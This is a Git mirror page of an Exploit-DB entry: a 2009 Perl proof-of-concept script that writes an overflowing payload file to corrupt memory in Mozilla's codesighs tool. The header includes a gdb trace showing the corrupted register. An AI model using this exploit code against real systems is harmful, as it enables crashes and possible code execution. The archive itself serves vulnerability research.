bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/10396.pl
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

97 lines
No EOL
2.7 KiB
Perl
Executable file
Raw Permalink Blame History

#!/usr/bin/perl
# thedailyshow.pl
# AKA
# Mozilla Codesighs Memory Corruption PoC
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.12.2009
#
# *********************************************************************************************************
#
# 257 while(0 == retval && NULL != fgets(lineBuffer, sizeof(lineBuffer), inOptions->mInput))
# (gdb)
# 259 trimWhite(lineBuffer);
# (gdb)
# trimWhite (inString=0xbfffd310 "1\tCODE\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 145 times>...) at codesighs.c:213
# 213 int len = strlen(inString);
# (gdb)
# 215 while(len)
# (gdb)
# 217 len--;
# (gdb)
# 219 if(isspace(*(inString + len)))
# (gdb)
# 221 *(inString + len) = '\0';
# (gdb)
# 215 while(len)
# (gdb)
# 217 len--;
# (gdb)
# 219 if(isspace(*(inString + len)))
# (gdb)
# 228 }
# (gdb)
# codesighs (inOptions=0xbffff350) at codesighs.c:261
# 261 scanRes = sscanf(lineBuffer,
# (gdb) i r
# eax 0x0 0
# ecx 0xb7fe468c -1208072564
# edx 0x82 130
# ebx 0x9d8ff4 10326004
# esp 0xbfffd040 0xbfffd040
# ebp 0xbffff328 0xbffff328
# esi 0x0 0
# edi 0x0 0
# eip 0x8048945 0x8048945 <codesighs+142>
# eflags 0x246 [ PF ZF IF ]
# cs 0x73 115
# ss 0x7b 123
# ds 0x7b 123
# es 0x7b 123
# fs 0x0 0
# gs 0x33 51
# (gdb) s
# 270 if(6 == scanRes)
# (gdb) i r
# eax 0x6 6
# ecx 0x414141 4276545
# edx 0x0 0
# ebx 0x9d8ff4 10326004
# esp 0xbfffd040 0xbfffd040
# ebp 0xbffff328 0xbffff328
# esi 0x0 0
# edi 0x0 0
# eip 0x804899d 0x804899d <codesighs+230>
# eflags 0x282 [ SF IF ]
# cs 0x73 115
# ss 0x7b 123
# ds 0x7b 123
# es 0x7b 123
# fs 0x0 0
# gs 0x33 51
# (gdb)
#
# http://jbrownsec.blogspot.com/2009/12/mozilla-code-sighs.html
#
# "Can't read my, can't read my, no she can't read my poker face"
#
# *********************************************************************************************************
# thedailyshow.pl
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename>\n";
exit;
}
$payload = "1\tCODE\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 260 . "\t";
open(FILE, ">", $filename) or die("\nError: Can't write to $filename");
print FILE $payload;
close(FILE);
print "Wrote payload to \"$filename\"\n";
exit;
Reference in a new issue View git blame Copy permalink